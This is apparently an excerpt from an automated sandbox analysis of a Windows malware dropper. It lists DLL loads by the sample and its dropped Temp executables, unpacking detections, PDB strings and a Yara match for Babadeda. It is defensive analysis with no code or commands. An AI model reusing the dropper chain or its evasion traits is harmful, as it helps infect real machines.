Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\takeown.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SUAosT64HD.exe

Static file information: File size 2966016 > 1048576

Source: SUAosT64HD.exe

Static PE information: Raw size of hsmahktm is bigger than: 0x100000 < 0x2a2800

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000000E.00000003.1923045915.00000000068E1000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000003.1922478872.00000000060EE000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000002.1929624688.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe, 0000000E.00000000.1920430499.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe.11.dr, apple[1].exe.11.dr, 39pazbF[1].exe.11.dr
Source:	Binary string: C:\Users\1231123\Desktop\DDriver\x64\Release\DDriver.pdb source: ssisd.sys.14.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Unpacked PE file: 1.2.SUAosT64HD.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Unpacked PE file: 4.2.3d9778a1ff.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 7.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 8.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 11.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 16.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 19.2.22.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 16.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.apple.exe.5b0bf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\22.exe, type: DROPPED

Entry point lies outside standard sections

Source: initial sample

